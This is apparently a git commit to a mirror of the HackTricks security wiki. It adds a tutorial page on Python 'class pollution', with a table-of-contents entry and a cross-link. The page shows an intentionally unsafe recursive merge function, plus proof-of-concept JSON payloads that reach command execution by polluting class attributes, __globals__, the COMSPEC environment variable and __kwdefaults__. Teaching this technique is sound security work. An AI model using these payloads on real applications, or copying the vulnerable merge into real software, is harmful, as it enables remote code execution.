mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GitBook: [#3736] No subject
This commit is contained in:
parent
b27e1c3e50
commit
618b244875
3 changed files with 279 additions and 20 deletions
|
@ -64,6 +64,7 @@
|
||||||
* [Python Sandbox Escape & Pyscript](generic-methodologies-and-resources/python/README.md)
|
* [Python Sandbox Escape & Pyscript](generic-methodologies-and-resources/python/README.md)
|
||||||
* [Pyscript](generic-methodologies-and-resources/python/pyscript.md)
|
* [Pyscript](generic-methodologies-and-resources/python/pyscript.md)
|
||||||
* [Basic Python](generic-methodologies-and-resources/python/basic-python.md)
|
* [Basic Python](generic-methodologies-and-resources/python/basic-python.md)
|
||||||
|
* [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
|
||||||
* [venv](generic-methodologies-and-resources/python/venv.md)
|
* [venv](generic-methodologies-and-resources/python/venv.md)
|
||||||
* [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md)
|
* [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md)
|
||||||
* [Output Searching Python internals](generic-methodologies-and-resources/python/bypass-python-sandboxes/output-searching-python-internals.md)
|
* [Output Searching Python internals](generic-methodologies-and-resources/python/bypass-python-sandboxes/output-searching-python-internals.md)
|
||||||
|
|
|
@ -0,0 +1,260 @@
|
||||||
|
# Class Pollution (Python's Prototype Pollution)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Basic Example
|
||||||
|
|
||||||
|
Check how is possible to pollute classes of objects with strings:
|
||||||
|
|
||||||
|
```python
|
||||||
|
class Company: pass
|
||||||
|
class Developer(Company): pass
|
||||||
|
class Entity(Developer): pass
|
||||||
|
|
||||||
|
c = Company()
|
||||||
|
d = Developer()
|
||||||
|
e = Entity()
|
||||||
|
|
||||||
|
print(c) #<__main__.Company object at 0x1043a72b0>
|
||||||
|
print(d) #<__main__.Developer object at 0x1041d2b80>
|
||||||
|
print(e) #<__main__.Entity object at 0x1041d2730>
|
||||||
|
|
||||||
|
e.__class__.__qualname__ = 'Polluted_Entity'
|
||||||
|
|
||||||
|
print(e) #<__main__.Polluted_Entity object at 0x1041d2730>
|
||||||
|
|
||||||
|
e.__class__.__base__.__qualname__ = 'Polluted_Developer'
|
||||||
|
e.__class__.__base__.__base__.__qualname__ = 'Polluted_Company'
|
||||||
|
|
||||||
|
print(d) #<__main__.Polluted_Developer object at 0x1041d2b80>
|
||||||
|
print(c) #<__main__.Polluted_Company object at 0x1043a72b0>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Basic Vulnerability Example
|
||||||
|
|
||||||
|
```python
|
||||||
|
# Initial state
|
||||||
|
class Employee: pass
|
||||||
|
emp = Employee()
|
||||||
|
print(vars(emp)) #{}
|
||||||
|
|
||||||
|
# Vulenrable function
|
||||||
|
def merge(src, dst):
|
||||||
|
# Recursive merge function
|
||||||
|
for k, v in src.items():
|
||||||
|
if hasattr(dst, '__getitem__'):
|
||||||
|
if dst.get(k) and type(v) == dict:
|
||||||
|
merge(v, dst.get(k))
|
||||||
|
else:
|
||||||
|
dst[k] = v
|
||||||
|
elif hasattr(dst, k) and type(v) == dict:
|
||||||
|
merge(v, getattr(dst, k))
|
||||||
|
else:
|
||||||
|
setattr(dst, k, v)
|
||||||
|
|
||||||
|
|
||||||
|
USER_INPUT = {
|
||||||
|
"name":"Ahemd",
|
||||||
|
"age": 23,
|
||||||
|
"manager":{
|
||||||
|
"name":"Sarah"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
merge(USER_INPUT, emp)
|
||||||
|
print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Gadget Examples
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary>Creating class property default value to RCE (subprocess)</summary>
|
||||||
|
|
||||||
|
```python
|
||||||
|
from os import popen
|
||||||
|
class Employee: pass # Creating an empty class
|
||||||
|
class HR(Employee): pass # Class inherits from Employee class
|
||||||
|
class Recruiter(HR): pass # Class inherits from HR class
|
||||||
|
|
||||||
|
class SystemAdmin(Employee): # Class inherits from Employee class
|
||||||
|
def execute_command(self):
|
||||||
|
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
|
||||||
|
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
|
||||||
|
|
||||||
|
def merge(src, dst):
|
||||||
|
# Recursive merge function
|
||||||
|
for k, v in src.items():
|
||||||
|
if hasattr(dst, '__getitem__'):
|
||||||
|
if dst.get(k) and type(v) == dict:
|
||||||
|
merge(v, dst.get(k))
|
||||||
|
else:
|
||||||
|
dst[k] = v
|
||||||
|
elif hasattr(dst, k) and type(v) == dict:
|
||||||
|
merge(v, getattr(dst, k))
|
||||||
|
else:
|
||||||
|
setattr(dst, k, v)
|
||||||
|
|
||||||
|
USER_INPUT = {
|
||||||
|
"__class__":{
|
||||||
|
"__base__":{
|
||||||
|
"__base__":{
|
||||||
|
"custom_command": "whoami"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
recruiter_emp = Recruiter()
|
||||||
|
system_admin_emp = SystemAdmin()
|
||||||
|
|
||||||
|
print(system_admin_emp.execute_command())
|
||||||
|
#> [!] Executing: "echo Hello there", output: "Hello there"
|
||||||
|
|
||||||
|
# Create default value for Employee.custom_command
|
||||||
|
merge(USER_INPUT, recruiter_emp)
|
||||||
|
|
||||||
|
print(system_admin_emp.execute_command())
|
||||||
|
#> [!] Executing: "whoami", output: "abdulrah33m"
|
||||||
|
```
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary>Polluting other classes and global vars through <code>globals</code> </summary>
|
||||||
|
|
||||||
|
```python
|
||||||
|
def merge(src, dst):
|
||||||
|
# Recursive merge function
|
||||||
|
for k, v in src.items():
|
||||||
|
if hasattr(dst, '__getitem__'):
|
||||||
|
if dst.get(k) and type(v) == dict:
|
||||||
|
merge(v, dst.get(k))
|
||||||
|
else:
|
||||||
|
dst[k] = v
|
||||||
|
elif hasattr(dst, k) and type(v) == dict:
|
||||||
|
merge(v, getattr(dst, k))
|
||||||
|
else:
|
||||||
|
setattr(dst, k, v)
|
||||||
|
|
||||||
|
class User:
|
||||||
|
def __init__(self):
|
||||||
|
pass
|
||||||
|
|
||||||
|
class NotAccessibleClass: pass
|
||||||
|
|
||||||
|
not_accessible_variable = 'Hello'
|
||||||
|
|
||||||
|
merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Polluted variable','NotAccessibleClass':{'__qualname__':'PollutedClass'}}}}}, User())
|
||||||
|
|
||||||
|
print(not_accessible_variable) #> Polluted variable
|
||||||
|
print(NotAccessibleClass) #> <class '__main__.PollutedClass'>
|
||||||
|
```
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary>Arbitrary subprocess execution</summary>
|
||||||
|
|
||||||
|
```python
|
||||||
|
import subprocess, json
|
||||||
|
|
||||||
|
class Employee:
|
||||||
|
def __init__(self):
|
||||||
|
pass
|
||||||
|
|
||||||
|
def merge(src, dst):
|
||||||
|
# Recursive merge function
|
||||||
|
for k, v in src.items():
|
||||||
|
if hasattr(dst, '__getitem__'):
|
||||||
|
if dst.get(k) and type(v) == dict:
|
||||||
|
merge(v, dst.get(k))
|
||||||
|
else:
|
||||||
|
dst[k] = v
|
||||||
|
elif hasattr(dst, k) and type(v) == dict:
|
||||||
|
merge(v, getattr(dst, k))
|
||||||
|
else:
|
||||||
|
setattr(dst, k, v)
|
||||||
|
|
||||||
|
# Overwrite env var "COMSPEC" to execute a calc
|
||||||
|
USER_INPUT = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
|
||||||
|
|
||||||
|
merge(USER_INPUT, Employee())
|
||||||
|
|
||||||
|
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
|
||||||
|
```
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary>Overwritting <strong><code>__kwdefaults__</code></strong></summary>
|
||||||
|
|
||||||
|
**`__kwdefaults__`** is a special attribute of all functions, based on Python [documentation](https://docs.python.org/3/library/inspect.html), it is a “mapping of any default values for **keyword-only** parameters”. Polluting this attribute allows us to control the default values of keyword-only parameters of a function, these are the function’s parameters that come after \* or \*args.
|
||||||
|
|
||||||
|
```python
|
||||||
|
from os import system
|
||||||
|
import json
|
||||||
|
|
||||||
|
def merge(src, dst):
|
||||||
|
# Recursive merge function
|
||||||
|
for k, v in src.items():
|
||||||
|
if hasattr(dst, '__getitem__'):
|
||||||
|
if dst.get(k) and type(v) == dict:
|
||||||
|
merge(v, dst.get(k))
|
||||||
|
else:
|
||||||
|
dst[k] = v
|
||||||
|
elif hasattr(dst, k) and type(v) == dict:
|
||||||
|
merge(v, getattr(dst, k))
|
||||||
|
else:
|
||||||
|
setattr(dst, k, v)
|
||||||
|
|
||||||
|
class Employee:
|
||||||
|
def __init__(self):
|
||||||
|
pass
|
||||||
|
|
||||||
|
def execute(*, command='whoami'):
|
||||||
|
print(f'Executing {command}')
|
||||||
|
system(command)
|
||||||
|
|
||||||
|
print(execute.__kwdefaults__) #> {'command': 'whoami'}
|
||||||
|
execute() #> Executing whoami
|
||||||
|
#> user
|
||||||
|
|
||||||
|
emp_info = json.loads('{"__class__":{"__init__":{"__globals__":{"execute":{"__kwdefaults__":{"command":"echo Polluted"}}}}}}') # attacker-controlled value
|
||||||
|
merge(emp_info, Employee())
|
||||||
|
|
||||||
|
print(execute.__kwdefaults__) #> {'command': 'echo Polluted'}
|
||||||
|
execute() #> Executing echo Polluted
|
||||||
|
#> Polluted
|
||||||
|
```
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
|
@ -2,17 +2,13 @@
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
@ -154,6 +150,12 @@ The following page present the technique to **abuse an unsafe deserialization in
|
||||||
[python-yaml-deserialization.md](python-yaml-deserialization.md)
|
[python-yaml-deserialization.md](python-yaml-deserialization.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
### Class Pollution (Python Prototype Pollution)
|
||||||
|
|
||||||
|
{% content-ref url="../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md" %}
|
||||||
|
[class-pollution-pythons-prototype-pollution.md](../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## NodeJS
|
## NodeJS
|
||||||
|
|
||||||
### JS Magic Functions
|
### JS Magic Functions
|
||||||
|
@ -849,16 +851,12 @@ Other RCE chain to exploit Ruby On Rails: [https://codeclimate.com/blog/rails-re
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
||||||
|
|
||||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
Loading…
Reference in a new issue